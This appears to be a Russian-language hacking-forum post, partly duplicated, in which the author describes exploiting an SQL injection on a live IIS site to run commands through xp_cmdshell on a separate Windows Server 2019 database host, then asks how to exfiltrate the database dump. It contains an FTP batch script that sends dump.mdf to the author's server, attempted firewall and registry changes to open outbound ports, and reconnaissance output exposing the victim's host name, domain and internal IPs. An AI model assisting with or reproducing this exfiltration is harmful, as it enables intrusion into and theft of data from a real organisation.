У вас должно быть более 1 реакций для просмотра скрытого контента.
Добрый день.
Имеется сайт на IIS 10.0, на сайте есть SQL инъекция с двумя векторами error-based + stacked queries. Через данные инъекции есть доступ к сервру Windows Server 2019 на котором крутится БД сайта. Сервер с базой стоит отдельно от сервера IIS. Могу подключаться к серверу на котором стоит БД через xp_cmdshell и через cmd выполнять некоторые команды + есть возможность заливать и запускать файлы на сервере. Задача - выгрузить куда либо дамп базы который лежит в директории: C:\Program Files\Microsoft SQL Server\MSSQL.14\MSSQL\Data
Мои попытки были выгрузить дамп к себе на ftp через батник, загружаю батник в директорию где лежит дамп и запускаю командой cmd /K "C:\Program Files\Microsoft SQL Server\MSSQL.14\MSSQL\Data\ftp.bat
На что получаю ответ:
Пробовал и нестандартные порты, постоянно таймаут. При этом пинг проходит на любой хост без проблем. Снаружи у сервера открыт только 443 порт.
Пытался добавить правило в фаерволл для открытия 21 порта, на что получаю:
Пытался добавить правило фаерволла через реестр:
Понятно что нет прав у юзера под которым я нахожусь в системе, при этом могу удалять свои файлы которые залил на сервер, стопать процессы (это все что пробовал). Познания в винде слабые, ввиду того что сталкиваюсь с данной ОС очень редко. Какие варианты есть выгрузить нужный файл? И есть ли вообще? Далее публикую некоторую инфу касаемо сервера.
whoami /all
net localgroup
systeminfo
net start
Если нужны еще какие то вводные то представлю по запросу.
Имеется сайт на IIS 10.0, на сайте есть SQL инъекция с двумя векторами error-based + stacked queries. Через данные инъекции есть доступ к сервру Windows Server 2019 на котором крутится БД сайта. Сервер с базой стоит отдельно от сервера IIS. Могу подключаться к серверу на котором стоит БД через xp_cmdshell и через cmd выполнять некоторые команды + есть возможность заливать и запускать файлы на сервере. Задача - выгрузить куда либо дамп базы который лежит в директории: C:\Program Files\Microsoft SQL Server\MSSQL.14\MSSQL\Data
Мои попытки были выгрузить дамп к себе на ftp через батник, загружаю батник в директорию где лежит дамп и запускаю командой cmd /K "C:\Program Files\Microsoft SQL Server\MSSQL.14\MSSQL\Data\ftp.bat
Код:
open ftp.myserver.com
login
passwd
send C:\Program Files\Microsoft SQL Server\MSSQL.14\MSSQL\Data\dump.mdf
quitНа что получаю ответ:
Код:
'> ftp: connect :Connection timed out'Пробовал и нестандартные порты, постоянно таймаут. При этом пинг проходит на любой хост без проблем. Снаружи у сервера открыт только 443 порт.
Пытался добавить правило в фаерволл для открытия 21 порта, на что получаю:
Код:
The requested operation requires elevation (Run as administrator).Пытался добавить правило фаерволла через реестр:
Код:
Запрос: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules" /v FTP2 /d "v2.28|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|RPort=21|Name=FTP2|"
Ответ: ERROR: Access is denied.Понятно что нет прав у юзера под которым я нахожусь в системе, при этом могу удалять свои файлы которые залил на сервер, стопать процессы (это все что пробовал). Познания в винде слабые, ввиду того что сталкиваюсь с данной ОС очень редко. Какие варианты есть выгрузить нужный файл? И есть ли вообще? Далее публикую некоторую инфу касаемо сервера.
whoami /all
Код:
---
USER INFORMATION
----------------
User Name SID
======================== =============================================
ngc\svcmastersql01 S-1-5-21-4048289222-346823271-2652735257-8672
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NGC-MASTERSQL01\SQLServerHADRUser$MSSQLSERVER Alias S-1-5-21-1366653098-1365682648-3139770139-1003 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disablednet localgroup
Код:
Aliases for \\NGC-MASTERSQL01
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$NGC-MASTERSQL01
*SQLServerHADRUser$MSSQLSERVER
*Storage Replica Administrators
*System Managed Accounts Groupsysteminfo
Код:
Host Name: NGC-MASTERSQL01
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-70000-00000-AA946
Original Install Date: 06.02.2021, 4:16:08
System Boot Time: 15.01.2022, 23:11:36
System Manufacturer: Supermicro
System Model: SSG-6048R-E1CR24H
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~3201 Mhz
[02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~3201 Mhz
BIOS Version: American Megatrends Inc. 3.3, 18.02.2021
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English
Input Locale: en-us;English (United States)
Total Physical Memory: 262 033 MB
Available Physical Memory: 4 647 MB
Virtual Memory: Max Size: 300 945 MB
Virtual Memory: Available: 42 737 MB
Virtual Memory: In Use: 258 208 MB
Page File Location(s): C:\pagefile.sys
Domain: Ngc.local
Logon Server: N/A
Hotfix(s): 12 Hotfix(s) Installed.
[01]: KB5006368
[02]: KB4470788
[03]: KB4535680
[04]: KB4577586
[05]: KB4587735
[06]: KB4589208
[07]: KB5003243
[08]: KB5005112
[09]: KB5008218
[10]: KB5006754
[11]: KB5008287
[12]: KB5005701
Network Card(s): 7 NIC(s) Installed.
[01]: Intel(R) Ethernet Controller X540-AT2
Connection Name: Eth01
Status: Hardware not present
[02]: Intel(R) Ethernet Controller X540-AT2
Connection Name: Eth02
Status: Hardware not present
[03]: Intel(R) Ethernet Converged Network Adapter X550-T2
Connection Name: Eth12
Status: Hardware not present
[04]: Intel(R) Ethernet Converged Network Adapter X550-T2
Connection Name: Eth11
Status: Hardware not present
[05]: Microsoft Network Adapter Multiplexor Driver
Connection Name: TEAM#01
DHCP Enabled: No
IP address(es)
[01]: 10.10.91.140
[02]: 10.10.91.10
[03]: 10.10.91.11
[04]: fe80::1931:8500:e0a6:d218
[06]: Mellanox ConnectX-4 Lx Ethernet Adapter
Connection Name: Eth10Gb-02
DHCP Enabled: Yes
DHCP Server: N/A
IP address(es)
[07]: Mellanox ConnectX-4 Lx Ethernet Adapter
Connection Name: Eth10Gb-01
DHCP Enabled: Yes
DHCP Server: N/A
IP address(es)
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Virtualization Enabled In Firmware: Yes
Second Level Address Translation: Yesnet start
Код:
These Windows services are started:
Application Information
AzureAttestService
Background Tasks Infrastructure Service
Base Filtering Engine
Certificate Propagation
Cluster Service
CNG Key Isolation
COM+ Event System
Connected Devices Platform Service
Connected Devices Platform User Service_a1d17
Connected User Experiences and Telemetry
CoreMessaging
Cryptographic Services
Data Sharing Service
DCOM Server Process Launcher
Device Setup Manager
DHCP Client
Diagnostic Policy Service
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Graylog collector sidecar - nxlog backend
Graylog Sidecar
Group Policy Client
IKE and AuthIP IPsec Keying Modules
IP Helper
IPsec Policy Agent
Local Session Manager
Microsoft Storage Spaces SMP
MSMFramework
Netlogon
Network Connection Broker
Network List Service
Network Location Awareness
Network Store Interface Service
Plug and Play
Power
Print Spooler
Program Compatibility Assistant Service
Remote Access Connection Manager
Remote Desktop Configuration
Remote Desktop Services
Remote Desktop Services UserMode Port Redirector
Remote Procedure Call (RPC)
Remote Registry
RPC Endpoint Mapper
Secure Socket Tunneling Protocol Service
Security Accounts Manager
Server
Shell Hardware Detection
SNMP Service
SQL Server (MSSQLSERVER)
SQL Server Agent (MSSQLSERVER)
SQL Server CEIP service (MSSQLSERVER)
SQL Server VSS Writer
State Repository Service
Storage Service
SysMain
System Event Notification Service
System Events Broker
Task Scheduler
TCP/IP NetBIOS Helper
Themes
Time Broker
Touch Keyboard and Handwriting Panel Service
Update Orchestrator Service
User Access Logging Service
User Manager
User Profile Service
Veeam Agent for Microsoft Windows
Veeam Installer Service
VeeamLogShipper
Web Account Manager
Windows Connection Manager
Windows Defender Antivirus Network Inspection Service
Windows Defender Antivirus Service
Windows Defender Firewall
Windows Event Log
Windows Font Cache Service
Windows License Manager Service
Windows Management Instrumentation
Windows Push Notifications System Service
Windows Push Notifications User Service_a1d17
Windows Remote Management (WS-Management)
Windows Security Service
Windows Time
WinHTTP Web Proxy Auto-Discovery Service
WorkstationЕсли нужны еще какие то вводные то представлю по запросу.
Последнее редактирование:
